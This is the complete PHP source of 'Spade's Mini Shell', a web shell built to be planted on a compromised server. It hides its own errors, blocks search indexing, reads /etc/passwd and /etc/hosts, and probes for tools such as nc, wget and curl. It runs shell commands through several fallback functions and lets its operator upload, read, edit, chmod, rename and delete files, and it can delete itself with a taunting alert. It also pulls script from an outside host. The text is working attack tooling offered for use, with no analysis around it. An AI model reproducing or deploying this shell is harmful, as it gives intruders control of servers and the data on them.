Spade's Mini Shell

1. <?php
2. // Spade's Mini Shell
3. @ini_set('error_log',NULL);
4. @ini_set('log_errors',0);
5. @ini_set('display_errors', 0);
6. @error_reporting(0);
7. @error_log(false);
8. $slash = '/';
9. if(strtolower(substr(PHP_OS,0,3))=='win'){ $os = 'win'; $slash = '\\'; $ox = "Windows";}else{ $os = "nix"; $ox = "Linux"; }
10. function sanitize($object){
11. return filter_var(htmlspecialchars($object), FILTER_SANITIZE_STRING);
12. }
13. function get_users(){
14. $users = array();
15. $user = file("/etc/passwd");
16. foreach ($user as $userx => $userz) {
17. $userct = explode(":", $userz);
18. array_push($users,$userct[0]);
19. }
20. if(!$user){
21. if($open = opendir("/home/")){
22. while(($file = readdir($open)) !== false){ array_push($users, $file); }
23. }
24. closedir($open);
25. }
26. $users = implode(', ', $users);
27. return $users;
28. }
29. function exe($cmd){
30. if(function_exists('system')) {
31. @ob_start();
32. @system($cmd);
33. $buff = @ob_get_contents();
34. @ob_end_clean();
35. }elseif(function_exists('exec')) {
36. @exec($cmd,$results);
37. $buff = join("\n", $results);
38. } elseif(function_exists('passthru')) {
39. @ob_start();
40. @passthru($cmd);
41. $buff = @ob_get_contents();
42. @ob_end_clean();
43. } elseif(function_exists('shell_exec')) {
44. $buff = @shell_exec($cmd);
45. }elseif(function_exists('proc_open')){
46. $desc = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
47. $handle = proc_open($cmd, $desc, $pipes);
48. if(is_resource($handle)){
49. if(function_exists('fread') && function_exists('feof')){
50. while(!feof($pipes[1])){ $buff .= fread($pipes[1], 512); }
51. }elseif(function_exists('fgets') && function_exists('feof')){
52. while(!feof($pipes[1])){ $buff .= fgets($pipes[1], 512); }
53. }
54. }
55. pclose($handle);
56. }elseif(function_exists('popen')){
57. $handle = popen($cmd, "r");
58. if(is_resource($handle)){
59. if(function_exists('fread') && function_exists('feof')){
60. while(!feof($handle)){ $buff .= fread($handle, 512); }
61. }elseif(function_exists('fgets') && function_exists('feof')){
62. while(!feof($handle)){ $buff .= fgets($handle, 512); }
63. }
64. }
65. pclose($handle);
66. }
67. $buff = wordwrap(htmlspecialchars($buff));
68. return $buff;
69. }
70. echo "
71. <!DOCTYPE html>
72. <html>
73. <head>
74. <link rel=\"shortcut icon\" href=\"http://i.imgur.com/iuhnNKU.png\" />
75. <meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW, NOARCHIVE\" />
76. <meta name=\"GOOGLEBOT\" content=\"NOINDEX, NOFOLLOW, NOARCHIVE\" />
77. <meta charset=\"UTF-8\">
78. <script type=\"text/javascript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js\"></script>
79. <link href='http://fonts.googleapis.com/css?family=Monoton' rel='stylesheet' type='text/css'>
80. <title>:~Spade Mini Shell~:</title>
81. <style>
82. @import url(\"http://fonts.googleapis.com/css?family=Iceberg:400\");
83. *, body, html { text-shadow: 0px 0px 1px #141414; cursor: url(http://cur.cursors-4u.net/cursors/cur-9/cur863.ani), url(http://cur.cursors-4u.net/cursors/cur-9/cur863.png), default !important;}
84. html {font-family: 'Iceberg';}
85. .chekwa{ display: none;}
86. .wala { border-bottom: none;}
87. input { border: none; background: none; font-family: 'Courier New';}
88. textarea{ background: #111111; font-family: 'Courier New'; font-size: 15px; border: 1px dashed lime; border-radius: 15px; padding: 10px; color: white;}
89. .submit{ background: lime; color: black; }
90. select{ background: lime; color: black; font-family: 'Courier New'; border: none;}
91. option{ font-family: 'Courier New'; background: lime; border: none;}
92. .titulo {text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none;}
93. body { background: #111111; color: white; text-align : center;}
94. .foot{ position: relative; width: 100%; bottom: 0;}
95. a { color: white; text-decoration: none;}
96. #details{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px; margin-top: 10px;}
97. tr:hover { background: #141414;}
98. a:hover { text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none; }
99. .lamesa, .mesa { width:100%; padding:4px 0; color:white; font-size:15px;}
100. .mesa td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top;}
101. .board {text-align: center;border: 1px solid rgba(255,180,0,0.4);border-radius: 4px;width: 500px;font-family: 'Monoton'}
102. .board p {font-size: 65px;font-family: 'Monoton', cursive;color: #fff;text-transform: uppercase;padding: 0;margin: 0;}
103. pre { text-align: left;}
104. .pare{ border: 1px dashed lime; border-radius: 15px; color: #9b9b9b; font-size: 15px; font-family: 'Courier New'; padding: 15px;}
105. textarea:focus{ outline: none;}
106. .piktur { width: 60px; cursor: pointer; opacity: .5; transition: .5s ease-in-out;}
107. .piktur:hover { opacity: 1; width: 75px;}
108. code { font-family: monospace; }
109. </style>";?>
110. <script type="text/javascript">
111. $(document).ready(function() {$('#spade').novacancy({'reblinkProbability': 0.1,'blinkMin': 0.2,'blinkMax': 0.6,'loopMin': 8,'loopMax': 10,'color': '#ffffff','glow': ['0 0 80px #ffffff', '0 0 30px #008000', '0 0 6px #0000ff']});
112. $('#pirates').novacancy({'blink': 1,'off': 1,'color': 'Red','glow': ['0 0 80px Red', '0 0 30px FireBrick', '0 0 6px DarkRed']});});
113. </script>
114. <?php echo "
115. </head>
116. <body>
117. <noscript><meta http-equiv=\"refresh\" content=\"0; URL=http://xbox.nu/sssssssssssppppppppppaaaaaaaaaaaadddddddeeeeeeeee.html\"></noscript>
118. <center><div class=\"board\" style=\"width: 30%;\"><p id=\"spade\">Spade</p><p id=\"pirates\">Mini Shell</p></div></center>
119. <div id='details'>
120. <table class=\"lamesa\" cellpadding=\"3\" cellspacing\"1\">
121. <tr>
122. <td><font class=\"titulo wala\">Directory:~$</font>&nbsp;";
123. if(isset($_GET['path'])){
124. $path = sanitize($_GET['path']);
125. }else{
126. $path = sanitize(getcwd());
127. }
128. $path = str_replace('\\','/',$path);
129. $paths = explode('/',$path);
130. foreach($paths as $id=>$peth){
131. if($peth == '' && $id == 0){
132. $a = true;
133. echo "<a href=\"?path=/\">/</a>";
134. continue;
135. }//if
136. if($peth == '') continue;
137. echo "<a href='?path=";
138. for($i=0;$i<=$id;$i++){
139. echo $paths[$i];
140. if($i != $id) echo "/";
141. }//for
142. echo "'>".$peth."</a>/";
143. }//foreach
144. echo "
145. </td>
146. </tr>
147. <tr>
148. <td>";
149. if(isset($_FILES['file'])){
150. if(@copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
151. echo "<font color=lime><a href=".sanitize($_FILES['file']['name'])." target='_blank'>File Uploaded!</font><br/>";
152. }else{
153. echo "<font color=red>File Not Uploaded!</font><br/>";
154. }//upload
155. }//file
156. echo "
157. <form method=POST enctype=\"multipart/form-data\"><font class=\"titulo wala\">Upload File<br><label for=\"upload\"><img class=\"piktur\" src=\"http://xbox.nu/upload.png\"><input id=\"upload\" class=\"chekwa\" type=\"file\" name=\"file\"></label><br><input type=\"submit\" class=\"submit\" ";
158. if(!is_writable($path)){echo "disabled value='Not Writable!' style='background: red;'";}else{ echo "value='Upload!'"; }
159. echo "
160. ></form>
161. </td>
162. </tr><tr><td class=\"wala\">[<a href=".sanitize($_SERVER['PHP_SELF']).">Home</a>]&nbsp;[<a href='?details'>System Details</a>]&nbsp;[<a href='?kill'>Kill Me</a>]</td></tr></table></div><table>";
163. if(isset($_GET['details'])){
164. global $os;
165. $ds = @ini_get("disable_functions");
166. $show_ds = (!empty($ds)) ? "<font color=red>".sanitize(wordwrap($ds))."</font>" : "<font color=gold>NONE</font>";
167. echo "</table><div id=\"details\"><table class=\"mesa\" width=100%><center>
168. <tr><td><h1 class=titulo>System Information</h1></td></tr>
169. <tr><td><font color=lime>OS</font>:: <font color=gold>".php_uname(s)."</font></td></tr>
170. <tr><td><font color=lime>PHP Version</font>:: <font color=gold>".phpversion()."</font></td></tr>
171. <tr><td><font color=lime>Kernel Release</font>:: <font color=gold>".php_uname(r)."</font></td></tr>
172. <tr><td><font color=lime>Kernel Version</font>:: <font color=gold>".php_uname(v)."</font></td></tr>
173. <tr><td><font color=lime>Machine</font>:: <font color=gold>".php_uname(m)."</font></td></tr>
174. <tr><td><font color=lime>Server Software</font>:: <font color=gold>".$_SERVER['SERVER_SOFTWARE']."</font></td></tr>
175. <tr><td style=\"text-align:left\"><font color=lime>Disabled Functions</font>:: <font color=gold>".wordwrap($show_ds)."</font></td></tr>";
176. if(function_exists('apache_get_modules')){
177. echo "<tr><td style=\"text-align:left\"><font color=lime>Loaded Apache Modules</font>:: <pre>";
178. $apache = implode(', ', apache_get_modules());
179. echo wordwrap($apache);
180. echo "</pre></td></tr>";
181. }//apache
182. if($os == 'win'){echo "<tr><td style=\"text-align:left\"><font color=lime>Account Settings</font>:: <pre>".exe('net accounts')."</pre></td></tr><tr><td style=\"text-align:left\"><font color=lime>User Accounts</font>:: <pre>".exe('net user')."</pre></td></tr>";}//Windows
183. if($os == 'nix'){
184. echo "<tr><td style=\"text-align:left\"><font color=lime>Distro</font>:: <pre>".exe('cat /etc/*-release')."</pre></td></tr>
185. <tr><td style=\"text-align:left\"><font color=lime>Distro Name</font>:: <pre>".exe('cat /etc/issue.net')."</pre></td></tr>
186. <tr><td style=\"text-align:left\"><font color=lime>GCC</font>:: <pre>".exe('whereis gcc')."</pre></td></tr>
187. <tr><td style=\"text-align:left\"><font color=lime>Perl</font>:: <pre>".exe('whereis perl')."</pre></td></tr>
188. <tr><td style=\"text-align:left\"><font color=lime>Java</font>:: <pre>".exe('whereis java')."</pre></td></tr>
189. <tr><td style=\"text-align:left\"><font color=lime>Python</font>:: <pre>".exe('whereis python')."</pre></td></tr>
190. <tr><td style=\"text-align:left\"><font color=lime>Apache</font>:: <pre>".exe('whereis apache')."</pre></td></tr>
191. <tr><td style=\"text-align:left\"><font color=lime>CPU</font>:: <pre>".exe('cat /proc/cpuinfo')."</pre></td></tr>
192. <tr><td style=\"text-align:left\"><font color=lime>RAM</font>:: <pre>".exe('free -m')."</pre></td></tr>
193. <tr><td style=\"text-align:left\"><font color=lime>User Limits</font>:: <pre>".exe('ulimit -a')."</pre></td></tr>
194. ";
195. $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
196. $uze=array();
197. foreach($useful as $uzeful){
198. if(exe("which $uzeful")){
199. $uze[]=$uzeful;
200. }
201. }
202. echo "<tr><td style='text-align:left'><font color=lime>Useful</font>::<pre>";
203. echo implode(', ',$uze);
204. echo "</pre></td></tr>";
205. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
206. $uze=array();
207. foreach($downloaders as $downloader){
208. if(exe("which $downloader")){
209. $uze[]=$downloader;
210. }
211. }
212. echo "<tr><td style='text-align:left'><font color=lime>Downloaders</font>::<pre>";
213. echo implode(', ',$uze);
214. echo "</pre></td></tr>";
215. echo "<tr><td style='text-align:left'><font color=lime>Users</font>::<pre>".wordwrap(get_users())."</pre</font></td></tr>
216. <tr><td style='text-align:left'><font color=lime>Hosts</font>::<pre>".exe('cat /etc/hosts')."</pre></font></td></tr>";
217. }//Linux
218. echo "</table></div>";
219. }elseif(isset($_GET['kill'])){
220. $me = sanitize($_SERVER['PHP_SELF']);
221. $akez = basename($me);
222. if(unlink($akez)){
223. echo "<script>alert('Sayonara Suckers .|.')</script><meta http-equiv=\"refresh\" content=\"0; URL=http://xbox.nu/r3dDXDTOOL.swf\">";
224. }else{ echo "<center><font color=red>Still Alive!</font></center>"; }
225. }elseif(isset($_GET['filesource'])){
226. echo "<tr><td class=\"titulo\"><center>Current File:~$&nbsp;".sanitize($_GET['filesource'])."</center></td></tr></table><br/>";
227. echo "<pre class=\"pare\"><code>".wordwrap(sanitize(file_get_contents($_GET['filesource'])))."</code></pre>";
228. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
229. echo "</table><br><center>".sanitize($_GET['path'])."<br><br>";
230. if($_POST['opt'] == 'chmod'){
231. if(isset($_POST['perm'])){
232. if(@chmod($_POST['path'], $_POST['perm'])){
233. echo "<font color=lime>Permission Changed!</font>";
234. }else{
235. echo "<font color=red>Permission Not Change!</font>";
236. }//change perm * chmod
237. }//perm
238. echo "<form method=POST><font class=\"titulo\">Permission:~$&nbsp;</font><input type=\"text\" name=\"perm\" size=\"4\" value='".substr(sprintf('%o', fileperms($_POST['path'])), -4)."'><input type=\"hidden\" name=\"path\" value='".$_POST['path']."'><input type=\"hidden\" name=\"opt\" value=\"chmod\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>";
239. }elseif($_POST['opt'] == 'rename'){
240. if(isset($_POST['newname'])){
241. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
242. echo "<font color=lime>File Name Changed!</font><br>";
243. }else{
244. echo "<font color=red>File Name Not Change!</font>";
245. }//rename
246. $_POST['name'] = $_POST['newname'];
247. }//rename
248. echo "<form method=POST><font class=\"titulo\">New Name:~$&nbsp;</font><input name= \"newname\" type=\"text\" size=\"20\" value='".sanitize($_POST['name'])."'><input type=\"hidden\" name=\"path\" value='".sanitize($_POST['path'])."'><input type=\"hidden\" name=\"opt\" value=\"rename\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>";
249. }elseif($_POST['opt'] == 'edit'){
250. if(isset($_POST['source'])){
251. $fopen = fopen($_POST['path'], 'w');
252. if(fwrite($fopen, $_POST['source'])){
253. echo "<font color=lime>File Editted!</font><br>";
254. }else{
255. echo "<font color=red>File Not Editted!</font><br>";
256. }//fwrite
257. fclose($fopen);
258. }//source
259. echo "<form method=POST><textarea cols=80 rows=20 name=\"source\">".sanitize(file_get_contents($_POST['path']))."</textarea><br><input type=\"hidden\" name=\"path\" value='".sanitize($_POST['path'])."'><input type=\"hidden\" name=\"opt\" value=\"edit\"><input type=\"submit\" class=\"submit\" value=\">>\"></form>";
260. }//chmod//rename//edit
261. echo "</center>";
262. }else{
263. echo "</table><br></center>";
264. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
265. if($_POST['type'] == 'dir'){
266. if(rmdir($_POST['path'])){
267. echo "<font color=lime>Directory Deleted!</font><br>";
268. }else{
269. echo "<font color=red>Directory Not Deleted!</font><br>";
270. }//rmdir
271. }elseif($_POST['type'] == 'file'){
272. if(unlink($_POST['path'])){
273. echo "<font color=lime>File Deleted!</font><br>";
274. }else{
275. echo "<font color=red>File Not Deleted!</font><br>";
276. }//unlink
277. }//dir//file
278. }//delete
279. echo "</center>";
280. $scandir = scandir($path);
281. echo "
282. <div class=\"content\" id=\"details\">
283. <table class=\"lamesa\" cellpadding=\"3\" cellspacing=\"1\">
284. <tr>
285. <th><font class=\"titulo\">Name</font></th>
286. <th><font class=\"titulo\">Size</font></th>
287. <th><font class=\"titulo\">Permissions</font></th>
288. <th><font class=\"titulo\">Options</font></th>
289. </tr>";
290. foreach($scandir as $dir){
291. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
292. echo "
293. <tr>
294. <td><a href=\"?path=".$path."/".$dir."\">".$dir."</a></td>
295. <td><center>~</center></td>
296. <td><center>";
297. if(is_writable($path.'/'.$dir)) echo "<font color=lime>";//is_writable
298. elseif(!is_readable($path.'/'.$dir)) echo "<font color=red>";//is_readable
299. echo perms($path.'/'.$dir);
300. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo "</font>";
301. echo "</center></td>
302. <td><center>
303. <form method=POST action=\"?option&path=".$path."\">
304. <select name=\"opt\">
305. <option value=\"\"></option>
306. <option value=\"delete\">Delete</option>
307. <option value=\"chmod\">Chmod</option>
308. <option value=\"rename\">Rename</option>
309. </select>
310. <input type=\"hidden\" name=\"type\" value=\"dir\">
311. <input type=\"hidden\" name=\"name\" value='".$dir.">
312. <input type=\"hidden\" name=\"path\" value='".$path."/".$dir.">
313. <input type=\"submit\" class=\"submit\" value=\">>\">
314. </form>
315. </center></td>
316. </tr>";
317. }//foreach
318. echo "
319. <tr>
320. <td>----------------</td><td>----------------</td><td>----------------</td><td>----------------</td>
321. </tr>";
322. foreach($scandir as $file){
323. if(!is_file($path.'/'.$file)) continue;//is_file
324. $size = filesize($path.'/'.$file)/1024;
325. $size = round($size,3);
326. if($size >= 1024){
327. $size = round($size/1024,2).' MB';
328. }else{
329. $size = $size.' KB';
330. }//size
331. echo "
332. <tr>
333. <td><a href=\"?filesource=".$path."/".$file."&path=".$path."\">".$file."</a></td>
334. <td><center>".$size."</center></td>
335. <td><center>";
336. if(is_writable($path.'/'.$file)) echo "<font color=lime>";//is_writable
337. elseif(!is_readable($path.'/'.$file)) echo "<font color=red>";//is_readable
338. echo perms($path.'/'.$file);
339. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo "</font>";
340. echo "</center></td>
341. <td><center>
342. <form method=POST action=\"?option&path=".$path."\">
343. <select name=\"opt\">
344. <option value=\"\"></option>
345. <option value=\"edit\">Edit</option>
346. <option value=\"delete\">Delete</option>
347. <option value=\"chmod\">Chmod</option>
348. <option value=\"rename\">Rename</option>
349. </select>
350. <input type=\"hidden\" name=\"type\" value=\"file\">
351. <input type=\"hidden\" name=\"name\" value='".$file."'>
352. <input type=\"hidden\" name=\"path\" value='".$path."/".$file."'>
353. <input type=\"submit\" class=\"submit\" value=\">>\">
354. </form>
355. </center></td>
356. </tr>";
357. }//foreach
358. echo "
359. </table>
360. </div>";
361. }//filesource//Delete
362. echo "
363. </table>
364.  
365. <script type=\"text/javascript\" src=\"http://xbox.nu/novacancy.js\"></script>
366. <div class='foot'>
367. <hr width='80%'>
368. <footer>&copy; <font color=lime class=titulo>Spade</font> ".date('Y')."</footer>
369. </div>
370. </body>
371. </html>";
372. function perms($file){
373. $perms = fileperms($file);
374. if (($perms & 0xC000) == 0xC000) {
375. // Socket
376. $info = 's';
377. } elseif (($perms & 0xA000) == 0xA000) {
378. // Symbolic Link
379. $info = 'l';
380. } elseif (($perms & 0x8000) == 0x8000) {
381. // Regular
382. $info = '-';
383. } elseif (($perms & 0x6000) == 0x6000) {
384. // Block special
385. $info = 'b';
386. } elseif (($perms & 0x4000) == 0x4000) {
387. // Directory
388. $info = 'd';
389. } elseif (($perms & 0x2000) == 0x2000) {
390. // Character special
391. $info = 'c';
392. } elseif (($perms & 0x1000) == 0x1000) {
393. // FIFO pipe
394. $info = 'p';
395. } else {
396. // Unknown
397. $info = 'u';
398. }
399. // Owner
400. $info .= (($perms & 0x0100) ? 'r' : '-');
401. $info .= (($perms & 0x0080) ? 'w' : '-');
402. $info .= (($perms & 0x0040) ?
403. (($perms & 0x0800) ? 's' : 'x' ) :
404. (($perms & 0x0800) ? 'S' : '-'));
405. // Group
406. $info .= (($perms & 0x0020) ? 'r' : '-');
407. $info .= (($perms & 0x0010) ? 'w' : '-');
408. $info .= (($perms & 0x0008) ?
409. (($perms & 0x0400) ? 's' : 'x' ) :
410. (($perms & 0x0400) ? 'S' : '-'));
411. // World
412. $info .= (($perms & 0x0004) ? 'r' : '-');
413. $info .= (($perms & 0x0002) ? 'w' : '-');
414. $info .= (($perms & 0x0001) ?
415. (($perms & 0x0200) ? 't' : 'x' ) :
416. (($perms & 0x0200) ? 'T' : '-'));
417.  
418. return $info;
419. }
420. ?>